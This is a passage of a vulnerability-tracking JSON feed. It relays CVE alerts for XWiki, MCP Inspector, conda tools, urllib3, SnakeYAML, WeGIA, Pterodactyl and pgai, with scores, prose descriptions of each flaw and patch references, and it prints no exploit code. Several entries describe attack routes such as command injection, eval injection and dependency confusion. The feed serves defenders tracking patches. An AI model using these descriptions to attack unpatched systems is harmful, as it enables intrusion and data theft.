"https://t.me/DarkWebInformer_CVEAlerts/18321", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49582\n\ud83d\udd25 CVSS Score: 8.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: XWiki is a generic wiki platform. When editing content that contains \"dangerous\" macros like malicious script macros that were authored by a user with fewer rights, XWiki warns about the execution of these macros since XWiki 15.9RC1. These required rights analyzers that trigger these warnings are incomplete, allowing an attacker to hide malicious content. For most macros, the existing analyzers don't consider non-lowercase parameters. Further, most macro parameters that can contain XWiki syntax like titles of information boxes weren't analyzed at all. Similarly, the \"source\" parameters of the content and context macro weren't anylzed even though they could contain arbitrary XWiki syntax. In the worst case, this could allow a malicious to add malicious script macros including Groovy or Python macros to a page that are then executed after another user with programming righs edits the page, thus allowing remote code execution. The required rights analyzers have been made more robust and extended to cover those cases in XWiki 16.4.7, 16.10.3 and 17.0.0.\n\ud83d\udccf Published: 2025-06-13T16:41:45.131Z\n\ud83d\udccf Modified: 2025-06-13T17:23:46.285Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-c32m-27pj-4xcj\n2. https://github.com/xwiki/xwiki-platform/commit/0a705e8e253cb871b804e25c53b2bde879c886bd\n3. https://github.com/xwiki/xwiki-platform/commit/3d451e957fe2b14459e9ac64172b4a0e4c46971c\n4. https://github.com/xwiki/xwiki-platform/commit/abdcefc0db27035b67329add836fd683e0cf92b8\n5. https://github.com/xwiki/xwiki-platform/commit/cc74dc802efe0e2d3fa2ba3355dbadc51c5fd8c7\n6. https://jira.xwiki.org/browse/XWIKI-22758\n7. https://jira.xwiki.org/browse/XWIKI-22759\n8. https://jira.xwiki.org/browse/XWIKI-22763\n9. https://jira.xwiki.org/browse/XWIKI-22799", "creation_timestamp": "2025-06-13T17:38:03.000000Z"}, {"uuid": "efd250dd-84d4-4430-a1c8-913d34f71f41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPRQ-W83Q-Q62H", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "150fcc94-be1d-49d2-8480-6493fff927ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPWF-8G29-85QM", "type": "seen", "source": "Telegram/F2G63fMNgyZcc0oNt6XGHExAkvTr9kUyS9C9Ki-AIDnnQ5g", "content": "", "creation_timestamp": "2026-04-21T21:27:12.000000Z"}, {"uuid": "531ea16b-5226-4558-93f6-34b6c1d7bffa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F8R-222P-6F5G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18339", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49596\n\ud83d\udd25 CVSS Score: 9.4 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio. Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.\n\ud83d\udccf Published: 2025-06-13T20:11:40.453Z\n\ud83d\udccf Modified: 2025-06-13T20:11:40.453Z\n\ud83d\udd17 References:\n1. https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g\n2. https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979", "creation_timestamp": "2025-06-13T20:35:33.000000Z"}, {"uuid": "a5b32c61-9f9c-4936-9a49-c3c4aac0fb11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JH2Q-MRMJ-HFF3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18338", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49598\n\ud83d\udd25 CVSS Score: 4.4 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: conda-forge-ci-setup is a package installed by conda-forge each time a build is run on CI. The conda-forge-ci-setup-feedstock setup script is vulnerable due to the unsafe use of the eval function when parsing version information from a custom-formatted meta.yaml file. An attacker controlling meta.yaml can inject malicious code into the version assignment, which is executed during file processing, leading to arbitrary code execution. Exploitation requires an attacker to modify the recipe file by manipulating the RECIPE_DIR variable and introducing a malicious meta.yaml file. While this is more feasible in CI/CD pipelines, it is uncommon in typical environments, reducing overall risk. This vulnerability is fixed in 4.15.0.\n\ud83d\udccf Published: 2025-06-13T20:22:37.600Z\n\ud83d\udccf Modified: 2025-06-13T20:22:37.600Z\n\ud83d\udd17 References:\n1. https://github.com/conda-forge/conda-forge-ci-setup-feedstock/security/advisories/GHSA-jh2q-mrmj-hff3\n2. https://github.com/conda-forge/conda-forge-ci-setup-feedstock/commit/fd91cb271c01f0e7928ebdc1feaac96fe385f959", "creation_timestamp": "2025-06-13T20:35:32.000000Z"}, {"uuid": "136a138e-ae44-45f4-a834-ec08d13c29b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83GH-P93G-CWGX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18546", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32800\n\ud83d\udd25 CVSS Score: 7.2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Conda-build contains commands and tools to build conda packages. Prior to version 25.3.0, the pyproject.toml lists conda-index as a Python dependency. This package is not published in PyPI. An attacker could claim this namespace and upload arbitrary (malicious) code to the package, and then exploit pip install commands by injecting the malicious dependency in the solve. This issue has been fixed in version 25.3.0. A workaround involves using --no-deps for pip install-ing the project from the repository.\n\ud83d\udccf Published: 2025-06-16T20:38:53.100Z\n\ud83d\udccf Modified: 2025-06-16T20:38:53.100Z\n\ud83d\udd17 References:\n1. https://github.com/conda/conda-build/security/advisories/GHSA-83gh-p93g-cwgx\n2. https://github.com/conda/conda-build/commit/f5a6aeef0d5d6940b8c2a88796910dc7476a62bb\n3. https://drive.google.com/file/d/18qe97zxcpTn2l84187A9meGCi2Wg-n_Y/view", "creation_timestamp": "2025-06-16T21:38:18.000000Z"}, {"uuid": "d06429bc-88e8-4916-b444-c7eae92bf84d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44Q9-RG2Q-5G99", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18558", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49823\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: (conda) Constructor is a tool which allows constructing an installer for a collection of conda packages. Prior to version 3.11.3, shell installer scripts process the installation prefix (user_prefix) using an eval statement, which executes unsanitized user input as shell code. Although the script runs with user privileges (not root), an attacker could exploit this by injecting arbitrary commands through a malicious path during installation. Exploitation requires explicit user action. This issue has been patched in version 3.11.3.\n\ud83d\udccf Published: 2025-06-17T02:21:17.496Z\n\ud83d\udccf Modified: 2025-06-17T02:21:17.496Z\n\ud83d\udd17 References:\n1. https://github.com/conda/constructor/security/advisories/GHSA-44q9-rg2q-5g99\n2. https://github.com/conda/constructor/commit/ce4c2d58cfcde2f62d038fb8aba013176c77a0b1", "creation_timestamp": "2025-06-17T02:38:46.000000Z"}, {"uuid": "3f345677-e865-48d8-b546-d38b794b5fdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77FJ-VX54-GVH7", "type": "published-proof-of-concept", "source": "Telegram/PLPaRbcJDaPiLP6CzuoYpp_an71AlFD-MBdwXLbLZgMJCSE", "content": "", "creation_timestamp": "2026-04-21T21:27:33.000000Z"}, {"uuid": "bf8ac9e4-d0bf-4979-9d78-61aeaca2de10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HPXJ-9FGP-FHHF", "type": "published-proof-of-concept", "source": "Telegram/PLPaRbcJDaPiLP6CzuoYpp_an71AlFD-MBdwXLbLZgMJCSE", "content": "", "creation_timestamp": "2026-04-21T21:27:33.000000Z"}, {"uuid": "19b593fe-aedb-4f57-9e52-fe169436c800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6RC6-P838-686F", "type": "published-proof-of-concept", "source": "Telegram/PLPaRbcJDaPiLP6CzuoYpp_an71AlFD-MBdwXLbLZgMJCSE", "content": "", "creation_timestamp": "2026-04-21T21:27:33.000000Z"}, {"uuid": "950af0aa-c958-4ebf-8164-1ab3bbb60071", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6335", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18576", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7923\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An authentication bypass vulnerability has been identified in Pulpcore when deployed with Gunicorn versions prior to 22.0, due to the puppet-pulpcore configuration. This issue arises from Apache's mod_proxy not properly unsetting headers because of restrictions on underscores in HTTP headers, allowing authentication through a malformed header. This flaw impacts all active Satellite deployments (6.13, 6.14 and 6.15) which are using Pulpcore version 3.0+ and could potentially enable unauthorized users to gain administrative access.\n\ud83d\udccf Published: 2024-09-04T13:41:48.872Z\n\ud83d\udccf Modified: 2025-06-17T08:38:14.465Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6335\n2. https://access.redhat.com/errata/RHSA-2024:6336\n3. https://access.redhat.com/errata/RHSA-2024:6337\n4. https://access.redhat.com/errata/RHSA-2024:8906\n5. https://access.redhat.com/security/cve/CVE-2024-7923\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2305718", "creation_timestamp": "2025-06-17T09:41:32.000000Z"}, {"uuid": "5ae96048-a989-45b8-8487-c077067f9652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7565-CQ32-VX2X", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18757", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-42453\n\ud83d\udd25 CVSS Score: 3.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Synapse is an open-source Matrix homeserver written and maintained by the Matrix.org Foundation. Users were able to forge read receipts for any event (if they knew the room ID and event ID). Note that the users were not able to view the events, but simply mark it as read. This could be confusing as clients will show the event as read by the user, even if they are not in the room. This issue has been patched in version 1.93.0. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2023-09-26T20:49:23.365Z\n\ud83d\udccf Modified: 2025-06-18T14:11:32.728Z\n\ud83d\udd17 References:\n1. https://github.com/matrix-org/synapse/security/advisories/GHSA-7565-cq32-vx2x\n2. https://github.com/matrix-org/synapse/pull/16327\n3. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/65QPC55I4D27HIZP7H2NQ34EOXHPP4AO/\n4. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AFB2Y3S2VCPCN5P2XCZTG24MBMZ7DM4/\n5. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N6P4QULVUE254WI7XF2LWWOGHCYVFXFY/\n6. https://security.gentoo.org/glsa/202401-12", "creation_timestamp": "2025-06-18T14:42:03.000000Z"}, {"uuid": "e47ff0fb-d5f9-4610-b20b-55582ff3b1bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66HX-CHF7-3332", "type": "seen", "source": "Telegram/K73t--MeF8g6jG3bb2C-tygRugHSGj3gpQqllzPf61swe44", "content": "", "creation_timestamp": "2026-04-22T01:19:46.000000Z"}, {"uuid": "2aeb8f10-8dbb-4594-8cd9-9b3f7f538d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQ8P-WC4F-VG7J", "type": "seen", "source": "Telegram/K73t--MeF8g6jG3bb2C-tygRugHSGj3gpQqllzPf61swe44", "content": "", "creation_timestamp": "2026-04-22T01:19:46.000000Z"}, {"uuid": "f0259846-f371-45f3-bcd6-28931f98e3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2HW3-H8QX-HQQP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18831", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50183\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: OpenList Frontend is a UI component for OpenList. Prior to version 4.0.0-rc.4, a vulnerability exists in the file preview/browsing feature of the application, where files with a .py extension that contain JavaScript code wrapped in  tags may be interpreted and executed as HTML in certain modes. This leads to a stored XSS vulnerability. This issue has been patched in version 4.0.0-rc.4.\n\ud83d\udccf Published: 2025-06-19T02:20:32.618Z\n\ud83d\udccf Modified: 2025-06-19T02:20:32.618Z\n\ud83d\udd17 References:\n1. https://github.com/OpenListTeam/OpenList/security/advisories/GHSA-2hw3-h8qx-hqqp\n2. https://github.com/OpenListTeam/OpenList-Frontend/commit/7b5ed20c608c7b9b36d1950a386678e0a89f8175", "creation_timestamp": "2025-06-19T02:40:16.000000Z"}, {"uuid": "5f1a0efe-4aec-44c9-bd2d-47b2cac39dc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQ67-6M6Q-MJ2V", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18829", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50181\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.\n\ud83d\udccf Published: 2025-06-19T01:08:00.340Z\n\ud83d\udccf Modified: 2025-06-19T01:08:00.340Z\n\ud83d\udd17 References:\n1. https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v\n2. https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857", "creation_timestamp": "2025-06-19T01:39:28.000000Z"}, {"uuid": "8c76dcda-e887-43dc-b4ff-bf80c7cab9b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94JR-7PQP-XHCQ", "type": "seen", "source": "Telegram/WzFh75qC0rKhc-ksOtYvdTuNUy7-5M1wjcl5aTvCRw8jriM", "content": "", "creation_timestamp": "2026-04-21T23:30:49.000000Z"}, {"uuid": "f166b2f8-28db-4126-9e52-d85e67f0c423", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JJR-VMV7-WH4W", "type": "seen", "source": "Telegram/oyZMMan-s6Tiqp0E7GyRtqQJ5Rv8-WlZqCZQGxoSrT1vjc4", "content": "", "creation_timestamp": "2026-04-22T23:21:08.000000Z"}, {"uuid": "1f87d2a0-043a-4b5d-bc7b-c953d1e71863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJMJ-J48Q-9WG2", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18694", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-1471\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization.\u00a0Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.\n\ud83d\udccf Published: 2022-12-01T10:47:07.203Z\n\ud83d\udccf Modified: 2025-06-18T08:32:58.546Z\n\ud83d\udd17 References:\n1. https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2\n2. https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479\n3. https://github.com/mbechler/marshalsec\n4. https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true\n5. https://groups.google.com/g/kubernetes-security-announce/c/mwrakFaEdnc\n6. https://security.netapp.com/advisory/ntap-20230818-0015/\n7. http://packetstormsecurity.com/files/175095/PyTorch-Model-Server-Registration-Deserialization-Remote-Code-Execution.html\n8. http://www.openwall.com/lists/oss-security/2023/11/19/1\n9. https://security.netapp.com/advisory/ntap-20240621-0006/\n10. https://infosecwriteups.com/%EF%B8%8F-inside-the-160-comment-fight-to-fix-snakeyamls-rce-default-1a20c5ca4d4c\n11. https://confluence.atlassian.com/security/cve-2022-1471-snakeyaml-library-rce-vulnerability-in-multiple-products-1296171009.html", "creation_timestamp": "2025-06-18T08:42:18.000000Z"}, {"uuid": "1a4204c6-f06c-47c9-8823-76b6796a17db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-52P5-5FMW-9HRF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18839", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-50201\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. Prior to version 3.4.2, an OS Command Injection vulnerability was identified in the /html/configuracao/debug_info.php endpoint. The branch parameter is not properly sanitized before being concatenated and executed in a shell command on the server's operating system. This flaw allows an unauthenticated attacker to execute arbitrary commands on the server with the privileges of the web server user (www-data). This issue has been patched in version 3.4.2.\n\ud83d\udccf Published: 2025-06-19T03:34:29.859Z\n\ud83d\udccf Modified: 2025-06-19T03:34:29.859Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-52p5-5fmw-9hrf\n2. https://github.com/LabRedesCefetRJ/WeGIA/commit/45f32ad1d52775fc99f3c90075c8136c6d4d1d3d", "creation_timestamp": "2025-06-19T04:41:30.000000Z"}, {"uuid": "be818ed1-a075-421a-be3f-62f37dfe54a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C3Q-X735-J3R5", "type": "seen", "source": "Telegram/WzFh75qC0rKhc-ksOtYvdTuNUy7-5M1wjcl5aTvCRw8jriM", "content": "", "creation_timestamp": "2026-04-21T23:30:49.000000Z"}, {"uuid": "86bad591-d040-4ea9-8989-ba67de4c27b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHVP-9HCJ-6M33", "type": "seen", "source": "Telegram/CTUi-siovRZPMXoRCribr6B1ZCHTTpPI8Ha33jZ7j7d94jM", "content": "", "creation_timestamp": "2026-04-21T23:30:54.000000Z"}, {"uuid": "bca404e2-3fb0-42cc-926d-cbb3cf7a7904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5GQC-QHRJ-9XW8", "type": "seen", "source": "Telegram/CTUi-siovRZPMXoRCribr6B1ZCHTTpPI8Ha33jZ7j7d94jM", "content": "", "creation_timestamp": "2026-04-21T23:30:54.000000Z"}, {"uuid": "a2dc74af-eb94-4d7a-af45-6e5163f20150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR6F-H4X7-R6QP", "type": "seen", "source": "Telegram/K73t--MeF8g6jG3bb2C-tygRugHSGj3gpQqllzPf61swe44", "content": "", "creation_timestamp": "2026-04-22T01:19:46.000000Z"}, {"uuid": "2f1f09d3-2808-4a2d-9145-21f35e8750ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24WV-6C99-F843", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19004", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49132\n\ud83d\udd25 CVSS Score: 10 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Pterodactyl is a free, open-source game server management panel. Prior to version 1.11.11, using the /locales/locale.json with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated. With the ability to execute arbitrary code it could be used to gain access to the Panel's server, read credentials from the Panel's config, extract sensitive information from the database, access files of servers managed by the panel, etc. This issue has been patched in version 1.11.11. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.\n\ud83d\udccf Published: 2025-06-20T16:56:41.403Z\n\ud83d\udccf Modified: 2025-06-20T17:34:24.439Z\n\ud83d\udd17 References:\n1. https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843\n2. https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0\n3. https://github.com/pterodactyl/panel/releases/tag/v1.11.11", "creation_timestamp": "2025-06-20T17:46:19.000000Z"}, {"uuid": "7eb2d75b-5ff3-4f65-9b1f-a0339c1ee87f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89QQ-HGVP-X37M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/18834", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52467\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: pgai is a Python library that transforms PostgreSQL into a retrieval engine for RAG and Agentic applications. Prior to commit 8eb3567, the pgai repository was vulnerable to an attack allowing the exfiltration of all secrets used in one workflow. In particular, the GITHUB_TOKEN with write permissions for the repository, allowing an attacker to tamper with all aspects of the repository, including pushing arbitrary code and releases. This issue has been patched in commit 8eb3567.\n\ud83d\udccf Published: 2025-06-19T02:50:51.240Z\n\ud83d\udccf Modified: 2025-06-19T02:50:51.240Z\n\ud83d\udd17 References:\n1. https://github.com/timescale/pgai/security/advisories/GHSA-89qq-hgvp-x37m\n2. https://github.com/timescale/pgai/pull/742\n3. https://github.com/timescale/pgai/commit/8eb356729c33560ce54b88b9a956960ad1e3ede8", "creation_timestamp": "2025-06-19T03:40:49.000000Z"}, {"uuid": "ec7b539a-36e2-49aa-9295-36c1ca5000a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98CP-84M9-Q3QP", "type": "seen", "source": "Telegram/K73t--MeF8g6jG3bb2C-tygRugHSGj3gpQqllzPf61swe44", "content": "", "creation_timestamp": "2026-04-22T01:19:46.000000Z"}, {"uuid": "bbebf8d7-7b18-4ee6-bd9b-328f2b2140f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3FPM-8RJR-V5MC", "type": "seen", "source": "Telegram/K73t--MeF8g6jG3bb2C-tygRugHSGj3gpQqllzPf61swe44", "content": "", "creation_timestamp": "2026-04-22T01:19:46.000000Z"}, {"uuid": "fd86c760-3522-4b8f-aab3-b9db893f9e5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5143", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-06-18T19:39:59.000000Z"}, {"uuid": "d7212e2b-47b4-4afe-b854-2289f6758b5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5145", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18810", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-06-18T18:51:22.323Z\n\ud83d\udd17 References:\n1. 